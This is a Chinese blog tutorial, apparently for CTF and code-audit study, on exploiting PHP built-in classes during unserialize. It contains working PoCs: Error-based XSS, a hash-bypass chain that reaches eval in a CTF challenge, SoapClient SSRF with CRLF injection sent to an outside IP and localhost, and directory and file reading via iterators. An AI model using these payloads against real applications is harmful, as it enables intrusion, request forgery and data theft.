深入了解PHP反序列化原生类

最新推荐文章于 2024-01-14 16:15:20 发布
最新推荐文章于 2024-01-14 16:15:20 发布
阅读量1.3k 收藏 14
点赞数 4
分类专栏: php 文章标签: php 开发语言

浅析php反序列化原生类的利用

如果在代码审计或者ctf中,有反序列化的功能点,但是却不能构造出完整的pop链,那这时我们应该如何破局呢?我们可以尝试一下从php原生类下手,php有些原生类中内置一些魔术方法,如果我们巧妙构造可控参数,触发并利用其内置魔术方法,就有可能达到一些我们想要的目的。

一、常见魔术方法

1

2

3

4

5

6

7

8

9

10

11

__wakeup() //执行unserialize()时,先会调用这个函数

__sleep() //执行serialize()时,先会调用这个函数

__destruct() //对象被销毁时触发

__call() //在对象上下文中调用不可访问的方法时触发

__callStatic() //在静态上下文中调用不可访问的方法时触发

__get() //用于从不可访问的属性读取数据或者不存在这个键都会调用此方法

__set() //用于将数据写入不可访问的属性

__isset() //在不可访问的属性上调用isset()或empty()触发

__unset() //在不可访问的属性上使用unset()时触发

__toString() //把对象当作字符串使用时触发

__invoke() //当尝试将对象调用为函数时触发

二、原生类中的魔术方法

我们采用下面脚本遍历一下所有原生类中的魔术方法

<?php
$classes = get_declared_classes();foreach ($classes as $class) {

    $methods = get_class_methods($class);

    foreach ($methods as $method) {

        if (in_array($method, array(

            '__destruct',

            '__toString',

            '__wakeup',

            '__call',

            '__callStatic',

            '__get',

            '__set',

            '__isset',

            '__unset',

            '__invoke',

            '__set_state'

        ))) {

            print $class . '::' . $method . "\n";

        }

    }}

 

三、一些常见原生类的利用

Error/Exception

Error 是所有PHP内部错误类的基类。 (PHP 7, 8)

**Error::__toString ** error 的字符串表达

返回 Error 的 string表达形式。

Exception是所有用户级异常的基类。 (PHP 5, 7, 8)

**Exception::__toString ** 将异常对象转换为字符串

返回转换为字符串(string)类型的异常。

类属性

  • message 错误消息内容

  • code 错误代码

  • file 抛出错误的文件名

  • line 抛出错误的行数

XSS

__toString方法会返回错误或异常的字符串形式,其中包含我们输入的参数,如果我们构造一串xss代码,结合echo渲染,将触发反射形xss漏洞

示例:

<?php
$a = unserialize($_GET['a']);
echo $a;

POC:

<?php
$a = new Error("<script>alert('xss')</script>");
$b = serialize($a);
echo urlencode($b);

 

hash绕过

先看一道题

[2020 极客大挑战]Greatphp

<?php
error_reporting(0);
class SYCLOVER {

    public $syc;

    public $lover;

    public function __wakeup(){

        if( ($this->syc != $this->lover) && (md5($this->syc) === md5($this->lover)) && (sha1($this->syc)=== sha1($this->lover)) ){

           if(!preg_match("/\<\?php|\(|\)|\"|\'/", $this->syc, $match)){

               eval($this->syc);

           } else {

               die("Try Hard !!");

           }

 

        }

    }}if (isset($_GET['great'])){

    unserialize($_GET['great']);} else {

    highlight_file(__FILE__);}

需要绕过两个hash强比较,且最终需要构造eval代码执行

显然正常方法是行不通的,而通过原生类可进行绕过

同样,当md5()和sha1()函数处理对象时,会自动调用__tostring方法

先简单看一下其输出

<?php
$a=new Error("payload",1);
$b=new Error("payload",2);
$c=new Exception("payload",3);

$d=new Exception("payload",4);

echo $a."<br>";

echo $b."<br>";

echo $c."<br>";

echo $d;

可以发现,这两个原生类返回的信息除了行号一模一样,利用这点,我们可以尝试进行hash函数的绕过,需要注意的是,必须将两个传入的对象放到同一行

因此我们可以进行简单的测试,发现使用此方法可以绕过hash强(弱)函数比较

<?php
$a = new Error("payload",1);
$b = new Error("payload",2);
if ($a!=$b){
    echo '$a不等于$b'."\n";
}
if (md5($a)===md5($b)){
    echo "md5值相等\n";
}
if (sha1($a)===sha1($b)){
    echo "sha1值相等";
}

 

 根据这些知识点,我们可以轻松构造payload

<?php
class SYCLOVER {

  public $syc;

  public $lover;

  public function __wakeup(){

      if( ($this->syc != $this->lover) && (md5($this->syc) === md5($this->lover)) && (sha1($this->syc)=== sha1($this->lover)) ){

         if(!preg_match("/\<\?php|\(|\)|\"|\'/", $this->syc, $match)){

             eval($this->syc);

         } else {

             die("Try Hard !!");

         }

          

      }

  }}$str = "?><?=include~".urldecode("%D0%99%93%9E%98")."?>";//两次取反绕过正则$a=new Error($str,1);

  $b=new Error($str,2);

  $c = new SYCLOVER();$c->syc = $a;$c->lover = $b;

  echo(urlencode(serialize($c)));?>

SoapClient

SoapClient是一个专门用来访问web服务的类,可以提供一个基于SOAP协议访问Web服务的 PHP 客户端,可以创建soap数据报文,与wsdl接口进行交互

soap扩展模块默认关闭,使用时需手动开启

SoapClient::__call —调用 SOAP 函数 (PHP 5, 7, 8)

通常,SOAP 函数可以作为SoapClient对象的方法调用

SSRF

构造函数:

public SoapClient :: SoapClient(mixed $wsdl [,array $options ])

第一个参数是用来指明是否是wsdl模式,如果为`null`,那就是非wsdl模式。

第二个参数为一个数组,如果在wsdl模式下,此参数可选;如果在非wsdl模式下,则必须设置location和uri选项,其中location是要将请求发送到的SOAP服务器的URL,而uri 是SOAP服务的目标命名空间。

什么是soap

SOAP 是基于 XML 的简易协议,是用在分散或分布的环境中交换信息的简单的协议,可使应用程序在 HTTP 之上进行信息交换

SOAP是webService三要素(SOAP、WSDL、UDDI)之一:WSDL 用来描述如何访问具体的接口, UDDI用来管理,分发,查询webService ,SOAP(简单对象访问协议)是连接或Web服务或客户端和Web服务之间的接口。

其采用HTTP作为底层通讯协议,XML作为数据传送的格式。

我们构造一个利用payload,第一个参数为NULL,第二个参数的location设置为vps地址

<?php

$a = new SoapClient(null, array(

'location' => 'http://47.102.146.95:2333', 

'uri' =>'uri',

'user_agent'=>'111111'));

$b = serialize($a);

echo $b;

$c = unserialize($b);

$c->a();

监听vps的2333端口,如下图所示成功触发SSRF,vps收到了请求信息

且可以看到SOAPAction和user_agent都可控

 

本地测试时发现,当使用此内置类(即soap协议)请求存在服务的端口时,会立即报错,而去访问不存在服务(未占用)的端口时,会等待一段时间报错,可以以此进行内网资产的探测。

如果配合CRLF漏洞,还可以可通过 SoapClient 来控制其他参数或者post发送数据。例如:HTTP协议去攻击Redis

CRLF知识扩展

HTTP报文的结构:状态行和首部中的每行以CRLF结束,首部与主体之间由一空行分隔。

CRLF注入漏洞,是因为Web应用没有对用户输入做严格验证,导致攻击者可以输入一些恶意字符。

攻击者一旦向请求行或首部中的字段注入恶意的CRLF(\r\n),就能注入一些首部字段或报文主体,并在响应中输出。

通过结合CRLF,我们利用SoapClient+CRLF便可以干更多的事情,例如插入自定义Cookie,

<?php
     $a = new SoapClient(null, array(

    'location' => 'http://47.102.146.95:2333',

    'uri' =>'uri',

    'user_agent'=>"111111\r\nCookie: PHPSESSION=dasdasd564d6as4d6a"));

    $b = serialize($a);echo $b;$c = unserialize($b);$c->a();

发送POST的数据包,这里需要将Content-Type设置为application/x-www-form-urlencoded,我们可以通过添加两个\r\n来将原来的Content-Type挤下去,自定义一个新的Content-Type

 

<?php
$a = new SoapClient(null, array(

    'location' => 'http://47.102.146.95:2333',

    'uri' =>'uri',

    'user_agent'=>"111111\r\nContent-Type: application/x-www-form-urlencoded\r\nX-Forwarded-For: 127.0.0.1\r\nCookie: PHPSESSID=3stu05dr969ogmprk28drnju93\r\nContent-Length: 10\r\n\r\npostdata"));

    $b = serialize($a);echo $b;$c = unserialize($b);$c->a();

看一道ctfshow上的题,完美利用上述知识点

$xff = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);

array_pop($xff);

$ip = array_pop($xff); //获取xff头

 

 

if($ip!=='127.0.0.1'){

    die('error');

}else{

    $token = $_POST['token'];

    if($token=='ctfshow'){

        file_put_contents('flag.txt',$flag);

    }

}

 poc:

<?php

$target = 'http://127.0.0.1/flag.php';

$post_string = 'token=ctfshow';

$b = new SoapClient(null,array('location' => $target,'user_agent'=>'wupco^^X-Forwarded-For:127.0.0.1,127.0.0.1^^Content-Type: application/x-www-form-urlencoded'.'^^Content-Length: '.(string)strlen($post_string).'^^^^'.$post_string,'uri'=> "ssrf"));

$a = serialize($b);

$a = str_replace('^^',"\r\n",$a);

echo urlencode($a);

?>

DirectoryIterator/FilesystemIterator

DirectoryIterator类提供了一个简单的接口来查看文件系统目录的内容。

DirectoryIterator::__toString 获取字符串形式的文件名 (PHP 5,7,8)

目录遍历

使用此内置类的__toString方法结合glob或file协议,即可实现目录遍历

例如:

<?php

$a = new DirectoryIterator("glob:///*");

foreach ($a as $b){

    echo $b.'<br>';

}

FilesystemIterator继承于DirectoryIterator,两者作用和用法基本相同,区别为FilesystemIterator会显示文件的完整路径,而DirectoryIterator只显示文件名

 

因为可以配合使用glob伪协议(查找匹配的文件路径模式),所以可以绕过open_basedir的限制

在php4.3以后使用了zend_class_unserialize_deny来禁止一些类的反序列化,很不幸的是这两个原生类都在禁止名单当中

SplFileObject

SplFileObject 类为单个文件的信息提供了一个面向对象的高级接口

(PHP 5 >= 5.1.2, PHP 7, PHP 8)

文件读取

SplFileObject::__toString — 以字符串形式返回文件的路径

<?php
highlight_file(__file__);
$a = new SplFileObject("./flag.txt");
echo $a;
/*foreach($context as $f){
    echo($a);

}*/

如果没有遍历的话只能读取第一行,且受到open_basedir影响

SimpleXMLElement

解析XML 文档中的元素。 (PHP 5、PHP 7、PHP 8)

SimpleXMLElement::__construct — 创建一个新的 SimpleXMLElement 对象

XXE

我们查看一下其参数:

 

 

根据官方文档,发现当第三个参数为True时,即可实现远程xml文件载入,第二个参数的常量值设置为2即可。

利用可参考赛题:[SUCTF 2018]Homework

ReflectionMethod

获取注释内容

(PHP 5 >= 5.1.0, PHP 7, PHP 8)

ReflectionFunctionAbstract::getDocComment — 获取注释内容
由该原生类中的getDocComment方法可以访问到注释的内容

 同时可利用的原生类还有ZipArchive– 删除文件等等,不在叙述。

原文链接 深入了解PHP反序列化原生类-php教程-PHP中文网

wwwarewow
关注
  • 4
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
深入理解C#序列化与反序列化的详解
01-01
在我们深入探讨C#序列化和反序列化之前我们先要明白什么是序列化,它又称串行化,是.NET运行时环境用来支持用户定义型的流化的机制。序列化就是把一个对象保存到一个文件或数据库字段中去,反序列化就是在适当的...
Day61:WEB攻防-PHP反序列化&原生TIPS&CVE绕过漏洞&属性型特征
最新发布
qq_61553520的博客
03-19 972
小迪安全-Day61:WEB攻防-PHP反序列化&原生TIPS&CVE绕过漏洞&属性型特征
WEB攻防-PHP反序列化&原生TIPS&CVE绕过漏洞&属性型特征
siu~
11-16 654
1、PHP-反序列化-属性型&显示特征 2、PHP-反序列化-CVE绕过&字符串逃逸 3、PHP-反序列化-原生生成&利用&配合
CTFSHOW卷王杯 easy unserialize
Landasika的博客
05-17 1270
<?php include("./HappyYear.php"); class one { public $object; public function MeMeMe() { array_walk($this, function($fn, $prev){ if ($fn[0] === "Happy_func" &&am...
PHP反序列化漏洞(入门)-魔术方法+原生
xiaoheizi的博客
07-02 1712
_sleep(): //serialize()函数会检查中是否存在一个魔术方法__sleep() 如果存在,该方法会被优先调用。当对不可访问属性调用 isset() 或 empty() 时,__isset() 会被调用。因为__toString()魔术方法是在把对象当做字符串使用的时候会被调用,所以这里会触发__toString()魔术方法。__isset(): //在不可访问的属性上调用isset()或empty()触发。
PHP反序列的两道题
qq_44640313的博客
03-28 442
php反序列化的学习
PHP之序列化与反序列化原生应用篇上)
errorr0
03-31 3151
PHP原生操作文件、XSS、哈希绕过
PHP原生反序列化(上)
m0_62422842的博客
06-01 1474
php代码只有一个或者没有利用时,我们就可以调用php的内置来进行目录遍历和任意文件读取等一系列的操作。内置,顾名思义就是php本身存在的,我们可以直接拿过来用。本次来学习经常能用到的几种内置。目录遍历的内置有三种。 查看官方文档可以发现FilesystemIterator与DirectoryIterator是继承关系的(附上官方文档PHP: SPL - Manual)在该下有一个_toString方法。这个会创建一个指定目录的迭代器,当遇上echo输出时就会自动调用_toStrin
深入理解Java对象的序列化与反序列化的应用
09-05
如果一个实现了`Externalizable`,那么序列化和反序列化的逻辑需要由自身提供,而不是依赖Java默认的实现。这允许开发者自定义对象如何被转换为字节流以及如何从字节流中重建对象。 总的来说,Java对象的序列化...
php json与xml序列化/反序列化
10-26
在Web开发中,数据交换和存储常常涉及到对象的序列化和反序列化PHP提供了多种方式来处理这一过程,其中最常用的两种...在实际应用中,理解并熟练掌握这两种序列化和反序列化方法对于提升代码效率和可维护性至关重要。
深入解析PHP中SESSION反序列化机制
10-20
主要介绍了PHP中SESSION反序列化机制的相关资料,文中介绍的非常相信,相信对大家具有一定的参考价值,需要的朋友们下面来一起看看吧。
2021-10-3 安全笔记周报(php 反序列化的两道例题)(待更新)
m0_54481455的博客
10-03 4599
Moectf2021 easyunserialize <?php classentrance { public$start; function__construct($start) { $this->start=$start; } function__destruct() { $this->start->helloworld(); } } c...
ctfshow(卷王杯)
qq_62046696的博客
09-24 1466
首先我们的前提是if(isset($_POST['a']) && isset($_POST['b']) && isset($_POST['c']))} 这里的name就是上面的string传进来的,但是 $var = $this->$name;array_walk函数的作用就是遍历自定义函数,其中$fn的值为成员的值,prev为成员变量的名字。这是个等于号,相当于赋值,而对于数组无法赋值的情况就是当键溢出就行,可以看到上一句有。如果是数组的话,第一个是,第二个是方法,第三个是属性。
浅谈PHP中GC回收机制的利用
errorr0
03-16 2222
GC回收及机制,在ctf中不会单独涉及,但是会糅合起来一起考!
【无标题】
weixin_51387754的博客
09-08 419
ctf可意译为“夺旗赛”。其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中得到一串具有一定格式的字符串或其他内容,并将其提交给主办方,从而夺得分数。为了方便称呼,我们把这样的内容称之为“Flag”。
PHP反序列化总结4--原生总结
m0_66458291的博客
01-14 679
PHP 原生指的是 PHP 内置的,它们可以直接在 PHP 代码中使用且无需安装或导入任何库,相当于代码中的内置方法例如echo ,print等等可以直接调用,但是原生就是可以就直接php中直接创建的,我们可以直接调用创建对象,但是这些中有的会有魔术方法,为此,我们可以创建原生去利用其中的魔术方法来达到我们反序列化的利用。
php-SER-libs-main反序列化靶场通关详细思路
qq_73767109的博客
05-30 3858
这里先是要把my实例化到body中,而project要是my中不存在的方法,理应随便赋值但是在触发__call后call需要输入两个参数,name可以自行赋值,但是func就要在触发时就有参数,所以在给project赋值的时候应该赋参数这样在。主要利用的是session.upload_progress.enabled 当该设置为on 的时候,在向服务器上传任意一个文件的时候php会把该上传文件的详细信息(如上传时间,文件名等)储存在session中,而当我们以。新手学习反序列化
PHP反序列化&魔术方法&原生(二)
m0_63917373的博客
11-16 355
PHP反序列化 魔术方法 原生
web安全-PHP反序列化漏洞
weixin_61956136的博客
07-10 2056
web安全-PHP反序列化漏洞
长亭php反序列化防护_PHP反序列化笔记
06-01
好的,您的问题是关于长亭PHP反序列化防护和PHP反序列化的笔记。 首先,PHP反序列化是指将序列化的数据转换回PHP对象或数组的过程。这个过程在应用程序中非常常见,但也很容易被黑客利用来执行恶意代码。因此,PHP反序列化漏洞是一个常见的安全问题。 为了应对这个问题,一些安全公司和开发者提供了一些防护措施,例如长亭安全团队的PHP反序列化防护工具。该工具使用了一些技巧,例如对反序列化对象进行检查、限制反序列化的深度和长度、限制反序列化和属性等等。 此外,为了更好地理解PHP反序列化和如何防护它,以下是一些笔记: 1. PHP的序列化和反序列化函数是serialize()和unserialize()。 2. 序列化的数据是一个字符串,可以存储在文件中或通过网络传输。 3. 反序列化需要传入序列化的字符串,并将其转换为PHP对象或数组。 4. 反序列化时需要注意的是,反序列化的数据可能包含恶意代码,因此必须进行检查和过滤。 5. 可以通过限制反序列化的深度和长度、限制反序列化和属性等方式来防止反序列化漏洞。 希望这些笔记可以帮助您更好地理解PHP反序列化和防护措施。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值